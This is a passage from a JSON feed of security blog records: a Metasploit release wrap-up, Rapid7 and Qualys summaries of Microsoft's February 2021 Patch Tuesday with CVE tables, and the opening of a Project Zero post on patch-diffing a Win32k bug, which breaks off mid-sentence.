[#14934](<https://github.com/rapid7/metasploit-framework/pull/14934>) from [timwr](<https://github.com/timwr>) A bug has been addressed whereby the `download` command in Meterpreter, if run on a directory containing UTF-8 characters, would result in an error. This has been resolved by enforcing the correct encoding.\n\n * [#14941](<https://github.com/rapid7/metasploit-framework/pull/14941>) from [dwelch-r7](<https://github.com/dwelch-r7>) The `smb_relay` module has been updated to force the use of `Rex::Proto::SMB::Client`, which fixes several issues that were being encountered due to the module accidentally using `ruby_smb` vs `Rex::Proto::SMB::Client`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-18T09%3A30%3A28-05%3A00..2021-03-25T11%3A07%3A15-05%3A00%22>)\n * [Full diff 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/compare/6.0.36...6.0.37>) \nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-03-26T17:36:13", "published": "2021-03-26T17:36:13", "id": "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "href": "https://blog.rapid7.com/2021/03/26/metasploit-wrap-up-104/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-10T00:48:57", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472", "CVE-2021-1639", "CVE-2021-1698", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1724", "CVE-2021-1726", "CVE-2021-1727", "CVE-2021-1728", "CVE-2021-1730", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-1734", "CVE-2021-21017", "CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-24066", "CVE-2021-24067", "CVE-2021-24068", "CVE-2021-24069", "CVE-2021-24070", "CVE-2021-24071", "CVE-2021-24072", "CVE-2021-24073", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24087", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24092", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24099", "CVE-2021-24100", "CVE-2021-24101", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24105", "CVE-2021-24106", "CVE-2021-24109", "CVE-2021-24111", "CVE-2021-24112", "CVE-2021-24113", "CVE-2021-24114", "CVE-2021-25195", "CVE-2021-26700", "CVE-2021-26701"], "description": "\n\nThe second Patch Tuesday of 2021 is relatively light on the vulnerability count, with 64 CVEs being addressed across the majority of Microsoft\u2019s product families. Despite that, there\u2019s still plenty to discuss this month.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 28 \nESU | 14 \nMicrosoft Office | 11 \nBrowser | 9 \nDeveloper Tools | 8 \nMicrosoft Dynamics | 2 \nExchange Server | 2 \nAzure | 2 \nSystem Center | 2 \n \n### Exploited and Publicly Disclosed Vulnerabilities\n\nOne zero-day was announced: [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) is a privilege elevation vulnerability affecting the Win32k component of Windows 10 and Windows Server 2019, reported to be exploited in the wild. Four vulnerabilities have been previously disclosed: [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), a privilege elevation vulnerability in Windows Installer, affecting all supported versions of Windows; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), which is a denial of service (DoS) affecting Windows 10 and Server 2019; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information disclosure vulnerability affecting DirectX in Windows 10 and Server 2019; and [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>), an RCE in .NET Core.\n\n### Vulnerabilities in Windows TCP/IP\n\nMicrosoft also disclosed a set of [three serious vulnerabilities](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) affecting the TCP/IP networking stack in all supported versions of Windows. Two of these ([CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>)) carry a base CVSSv3 score of 9.8 and could allow Remote Code Execution (RCE). [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) is specific to IPv6 link-local addresses, meaning it isn\u2019t exploitable over the public internet. [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>), however, does not have this limitation. The third, [CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>), is a DoS vulnerability that could allow an attacker to trigger a \u201cblue screen of death\u201d on any Windows system that is directly exposed to the internet, using only a small amount of network traffic. The RCE exploits are probably not a threat in the short term, due to the complexity of the vulnerabilities, but DoS attacks are expected to be seen much more quickly. Windows systems should be patched as soon as possible to protect against these.\n\nIn the event a patch cannot be applied immediately, such as on systems that cannot be rebooted, Microsoft has published mitigation guidance that will protect against exploitation of the TCP/IP vulnerabilities. Depending on the exposure of an asset, IPv4 Source Routing should be disabled via a Group Policy or a Netsh command, and IPv6 packet reassembly should be disabled via a separate Netsh command. IPv4 Source Routing requests and IPv6 fragments can also be blocked load balancers, firewalls, or other edge devices to mitigate these issues.\n\n### Zerologon Update\n\nBack in August, 2020, Microsoft addressed a critical remote code vulnerability (CVE-2020-1472) affecting the Netlogon protocol (MS-NRPC), a.k.a. \u201c[Zerologon](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>)\u201d. In October, Microsoft [noted](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) that attacks which exploit this weakness have been seen in the wild. On January 14, 2021, they [reminded](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>) organizations that the February 2021 security update bundle will also be enabling \u201cDomain Controller enforcement mode\" by default to fully address this weakness. Any system that tries to make an insecure Netlogon connection will be denied access. Any business-critical process that relies on these insecure connections will cease to function. Rapid7 encourages all organizations to [heed the detailed guidance](<https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e#bkmk_detectingnon_compliant>) before applying the latest updates to ensure continued business process continuity.\n\n### Adobe\n\nMost important amongst the [six security advisories](<https://helpx.adobe.com/security.html>) published by Adobe today is [APSB21-09](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>), detailing 23 CVEs affecting Adobe Acrobat and Reader. Six of these are rated Critical and allow Arbitrary Code Execution, and one of which (CVE-2021-21017), has been seen exploited in the wild in attacks targeting Adobe Reader users on Windows.\n\n### Summary Tables\n\n#### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24109>) | Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-24087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24087>) | Azure IoT CLI extension Elevation of Privilege Vulnerability | No | No | 7 | Yes \n \n#### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24100>) | Microsoft Edge for Android Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-24113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24113>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-21148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21148>) | Chromium CVE-2021-21148: Heap buffer overflow in V8 | N/A | N/A | nan | Yes \n[CVE-2021-21147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21147>) | Chromium CVE-2021-21147: Inappropriate implementation in Skia | N/A | N/A | nan | Yes \n[CVE-2021-21146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21146>) | Chromium CVE-2021-21146: Use after free in Navigation | N/A | N/A | nan | Yes \n[CVE-2021-21145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21145>) | Chromium CVE-2021-21145: Use after free in Fonts | N/A | N/A | nan | Yes \n[CVE-2021-21144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21144>) | Chromium CVE-2021-21144: Heap buffer overflow in Tab Groups | N/A | N/A | nan | Yes \n[CVE-2021-21143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21143>) | Chromium CVE-2021-21143: Heap buffer overflow in Extensions | N/A | N/A | nan | Yes \n[CVE-2021-21142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21142>) | Chromium CVE-2021-21142: Use after free in Payments | N/A | N/A | nan | Yes \n \n#### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-26700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26700>) | Visual Studio Code npm-script Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1639>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7 | No \n[CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) | Sysinternals PsExec Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-24105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24105>) | Package Managers Configurations Remote Code Execution Vulnerability | No | No | 8.4 | Yes \n[CVE-2021-24111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24111>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | Yes | 6.5 | No \n[CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) | .NET Core Remote Code Execution Vulnerability | No | Yes | 8.1 | Yes \n[CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>) | .NET Core Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n \n#### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24080>) | Windows Trust Verification API Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>) | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1734>) | Windows Remote Procedure Call Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-25195](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-25195>) | Windows PKU2U Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>) | Windows Local Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-24102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24102>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24103>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24083>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n#### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24085>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-1730](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1730>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 5.4 | Yes \n \n#### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1724>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 6.1 | No \n[CVE-2021-24101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24101>) | Microsoft Dataverse Information Disclosure Vulnerability | No | No | 6.5 | Yes \n \n#### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24073>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2021-24099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24099>) | Skype for Business and Lync Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24114>) | Microsoft Teams iOS Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1726>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-24072](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24072>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24066>) | Microsoft SharePoint Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24071](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24071>) | Microsoft SharePoint Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-24067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24067>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24068>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24069>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24070>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1728>) | System Center Operations Manager Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24092>) | Microsoft Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n#### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) | Windows Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-1698](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1698>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24075>) | Windows Network File System Denial of Service Vulnerability | No | No | 6.8 | No \n[CVE-2021-24084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24084>) | Windows Mobile Device Management Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24096>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>) | Windows DirectX Information Disclosure Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>) | Windows Console Driver Denial of Service Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>) | Windows Camera Codec Pack Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24079](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24079>) | Windows Backup Engine Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1731>) | PFX Encryption Security Feature Bypass Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24082>) | Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-24076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24076>) | Microsoft Windows VMSwitch Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>) | Microsoft Windows Codecs Library Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n### Summary Charts\n\n\n\n________Note: _______Chart_______ data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "modified": "2021-02-09T23:51:27", "published": "2021-02-09T23:51:27", "id": "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "href": "https://blog.rapid7.com/2021/02/09/patch-tuesday-february-2021/", "type": "rapid7blog", "title": "Patch Tuesday - February 2021", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-03-03T12:28:18", "bulletinFamily": "blog", "cvelist": ["CVE-2021-1732", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24086", "CVE-2021-24094"], "description": "This month\u2019s Microsoft Patch Tuesday addresses 56 vulnerabilities, of which 11 are rated as Critical. Adobe released patches today for Reader, Acrobat, Magento, Photoshop, Animate, Illustrator, and Dreamweaver.\n\n### TCP/IP Trio\n\nMicrosoft released a set of fixes affecting Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074 and CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086). While there is no evidence that these vulnerabilities are exploited in wild, these vulnerabilities should be prioritized given their impact.\n\n### Windows Fax Service\n\nMicrosoft released patches to fix a remote code execution vulnerability in Windows Fax Service (CVE-2021-24077). This vulnerability has a CVSSv3 base score of 9.8 and should be prioritized for patching.\n\n### Windows DNS Server\n\nMicrosoft released patches to fix a remote code execution vulnerability in Windows DNS Server (CVE-2021-24078). This vulnerability has a CVSSv3 base score of 9.8 and should be prioritized for patching.\n\n### Windows Win32k Elevation of Privilege\n\nMicrosoft released updates to fix a local privilege escalation vulnerability in Win32K (CVE-2021-1732). This vulnerability is reportedly exploited in the wild and should be prioritized for patching.\n\n### Workstation Patches\n\nMicrosoft Office vulnerabilities should be prioritized for workstation-type devices.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in Adobe Reader, Acrobat, Magento, Photoshop, Animate, Illustrator, and Dreamweaver. Patching Adobe Acrobat and Reader should be prioritized as Adobe has received reports of CVE-2021-21017 exploited in wild targeting Adobe Reader users on Windows.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "modified": "2021-02-09T20:22:38", "published": "2021-02-09T20:22:38", "id": "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "February 2021 Patch Tuesday \u2013 56 Vulnerabilities, 11 Critical, Adobe", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). \n\n** \n**\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\n** \n**\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\n** \n**\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\n** \n**\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\n** \n**\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows kernel.\n\n** \n**\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:\n\n 1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\n** \n**\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\n** \n**\n\nTurns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\n** \n**\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of 